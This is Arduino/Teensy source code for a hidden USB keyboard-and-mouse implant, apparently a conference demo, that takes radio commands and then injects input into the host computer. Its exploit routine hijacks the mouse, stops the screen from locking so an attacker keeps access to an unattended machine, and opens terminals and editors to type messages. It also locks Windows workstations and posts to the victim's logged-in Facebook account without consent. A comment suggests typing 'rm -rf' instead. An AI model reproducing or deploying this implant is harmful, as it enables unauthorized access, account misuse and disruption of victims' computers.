// Recevier_and_Exploit // Receiver RF commands and execute the exploits // by Monta Elkins // monta.defcon@geekslunch.com // http://www.hackerwarrior.com/urphuked // // (part of the exploit code below is derived from code from the Iron Geek http://www.irongeek.com) // //To learn more about Teensyduino see: //http://www.pjrc.com/teensy/teensyduino.html //http://www.arduino.cc/en/Reference/HomePage //Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions //Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID // // int debug=0; // This line defines a "Uart" object to access the serial port HardwareSerial Uart = HardwareSerial(); int command_seq_no; int command_byte; int checksum; int checksum_in; int timeout; int last_command_seq_no=0; int carrier_bytes=0; int count=0; void setup() { Uart.begin(1200); // RF receiver if (debug>0){delay(10000);} if (debug>0){Keyboard.print ("Receiver Ready");} } void loop() { //============================================================ // Receiver // This code deals with receiving and verifying the attack // code (4 bits). Then the specified attack is executed below. //============================================================ int incomingByte; looking_for_carrier: carrier_bytes=0; while (carrier_bytes < 3) { // Wait for carrier detect (3 bytes of "AA" ) while (Uart.available()==0) { //wait for a byte } incomingByte = Uart.read(); if (incomingByte==170) { //"AA" hex carrier_bytes++; if (debug>2) { Keyboard.println(" Carrier Byte Received ");} } else { // didn't get a carrier byte- so reset if (debug>0) { if (carrier_bytes>0) { // only print if at least 1 was received Keyboard.println("--Carrier Receive Failed "); } } goto looking_for_carrier; } } ////////////////////////////////// // Carrier received successfully. ////////////////////////////////// if (debug>2) { Keyboard.println("Full Carrier Received ");} ////////////////////////////////// // Wait if there are some more carrier bytes ////////////////////////////////// command_seq_no=170; while (command_seq_no == 170) { command_seq_no=Read_Wireless (); } if (debug>1) { Keyboard.print (" command_seq_no: "); Keyboard.println (command_seq_no); } if (command_seq_no > 127) { // invalid command seq number (too high) if (debug>2) { Keyboard.print (" command_seq_no invalid (too high) ");} goto looking_for_carrier; } // Get Command Byte command_byte=Read_Wireless (); // Get Check sum checksum=command_byte+command_seq_no; checksum_in=Read_Wireless (); if (checksum_in==checksum) { //////////////////////// // PASSED Checksum //////////////////////// if (debug>2) { Keyboard.println (" Checksum passed!");} // Now check that command_sequence_no is not the same as the last one. // That way we can transmit the same command multiple times withou // fear of executing it more than once per button press if (command_seq_no != last_command_seq_no) { // this command is NOT a repeat- so do it! // reset last_command_seq_no last_command_seq_no=command_seq_no; ////////////////////////////////// // Run command here ////////////////////////////////// if (debug>0) { Keyboard.print (" Running Command #:"); Keyboard.println (command_byte); } exploit(); if (debug>0) { Keyboard.println (" Returned from exploit"); } ////////////////////////////////////// } } else { // Checksum failed // The wireless connection can be noisy // so checksum has to pass before command is run if (debug>0) { Keyboard.println (" Checksum failed");} } } ///////////////////////////////////////////////////////////////////// // FUNCTIONS ///////////////////////////////////////////////////////////////////// // Read.Wireless // ok it has an ugly side. // a goto if a timeout is reached. deal. int Read_Wireless (){ int in; // wait for a radio character timeout=0; while (Uart.available()==0) { if (timeout++==0) { if (debug >0) { Keyboard.println(" Timeout waiting for receive char"); } } } in=Uart.read(); return in; } //================================================================== // Exploit code // Once received, the actual exploits are executed here //=================================================================== /////////////////////////// // Iron Geek // Some of the exploit code is based on Irongeek's code to do simple keyboard/mouse functions with the Teensy, // http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle ///////////////////////// int ledPin = 11; // Commands are sent as 4 bits // Each command has its own routine defined below void exploit() { // -------------------------------------------------------------------------- if (command_byte==B0000) { // move mouse randomly for a few seconds // if you wanted to be more malicious, you could add random mouse clicks as well count=0; while (count++<3000) { // Random moves Mouse.move(random(-10,11) ,random(-10,11) ); } } //---------------------------------------------------------------------------- if (command_byte==B0001) { // move mouse to bottom right // This is "less obvious" but effectively keeps user from having any mouse control // for several seconds. count=0; while (count++<10000) { // Move to bottom right Mouse.move(100 ,100 ); } } //---------------------------------------------------------------------------- if (command_byte==B0010) { // Stop screenlock (screensaver) // Move mouse very slightly to keep the terminal from locking // This will give you access after the user logs in, and walks away // from his/her terminal (at night etc.) // assuming the screen saver will lock on 10 minutes of inactivity // lets move the mouse every 9 minutes. int move_time=9; while (1) { // Do this forever Mouse.move(0,1 ); // move mouse slightly Mouse.move(0,-1 ); // then move it back delay (move_time*1000*60); // delay move_time minutes } } //---------------------------------------------------------------------------- if (command_byte==B0101) { // Windows Demo // xp // Open a notepad window and type a message // If you are doing the attack without a transmitter trigger, you need a long // need long delay for first registration ~30 seconds or longer for xp machines //delay(60000); digitalWrite(ledPin, HIGH); // set the LED on CommandAtRunBar("notepad.exe"); delay(1500); Keyboard.print("Pwnzored by Monta"); } //---------------------------------------------------------------------------- if (command_byte==B1101) { // Linux // Open an xterm window and type a message in it. // of course it could just as easily be a command like rm -rf // (tested on Ubuntu and Fedora and Backtrack) Keyboard.set_modifier(4); //Alt key Keyboard.set_key1(KEY_F2); // use f2 key Keyboard.send_now(); // send strokes Keyboard.set_modifier(0); //prep release of control keys Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times. Keyboard.send_now(); //Send the key changes delay(1500); //Keyboard.print("gedit"); Keyboard.print("xterm"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(750); Keyboard.print ("This machine pwned by Monta!"); } //---------------------------------------------------------------------------- // Apple // fail asks to press left shift key to identify keyboard // mabye emulating a "standard windows keyboard" by dell would work. // to register a keyboard [space]z/[tab][tab][space] if (command_byte==B1001) { // This should register the device in Apple and get rid of the box // untested Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_key1(KEY_Z); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_key1(KEY_SLASH); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_key1(KEY_TAB); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_key1(KEY_TAB); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); // Start up the textedit.app and type in it Keyboard.set_modifier(8); //Alt key Keyboard.set_key1(KEY_SPACE); // use f2 key Keyboard.send_now(); // send strokes Keyboard.set_modifier(0); //prep release of control keys Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times. Keyboard.send_now(); //Send the key changes delay(750); // Keyboard.print("textedit.app"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(750); Keyboard.print ("This machine pwned by Monta!"); } // //---------------------------------------------------------------------------- //Locks the workstaion if you are in Windows // Makes a cute Denial of Service attack if (command_byte==B0110) { digitalWrite(ledPin, HIGH); // set the LED on Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_ALT); Keyboard.set_key1(KEY_DELETE); // use delete key Keyboard.send_now(); // send strokes Keyboard.set_modifier(0); //prep release of control keys Keyboard.set_key1(KEY_ENTER); delay(1500); Keyboard.send_now(); //Send the key changes Keyboard.set_key1(0); Keyboard.send_now(); } //---------------------------------------------------------------------------- //Opens a browser to http://www.hackerwarrior // Kitty Porn attack shows pictures of kittens in the browser // screen can be "locked" by rendering mouse useless with mouse attack if (command_byte==B0111) { digitalWrite(ledPin, HIGH); // set the LED on CommandAtRunBar("cmd /c start http://www.hackerwarrior/kitty_porn.html"); } //---------------------------------------------------------------------------- //Make a facebook post, assumes the person is logged in. if (command_byte==B0111) { digitalWrite(ledPin, HIGH); // set the LED on CommandAtRunBar("cmd /c start http://m.facebook.com"); delay(6000); PressAndRelease(KEY_TAB, 8); Keyboard.print("Test from urfuked device, more info at http://www.hackerwarrior.com/urfuked"); PressAndRelease(KEY_TAB, 1); PressAndRelease(KEY_ENTER, 1); } } void CommandAtRunBar(char *SomeCommand) { digitalWrite(ledPin, HIGH); // set the LED on Keyboard.set_modifier(128); //Windows key Keyboard.set_key1(KEY_R); // use r key Keyboard.send_now(); // send strokes Keyboard.set_modifier(0); //prep release of control keys Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times. Keyboard.send_now(); //Send the key changes delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void PressAndRelease(int KeyCode,int KeyCount){ int KeyCounter=0; for (KeyCounter=0; KeyCounter!=KeyCount; KeyCounter++){ Keyboard.set_key1(KeyCode); // use r key Keyboard.send_now(); // send strokes Keyboard.set_key1(0); Keyboard.send_now(); // send strokes } }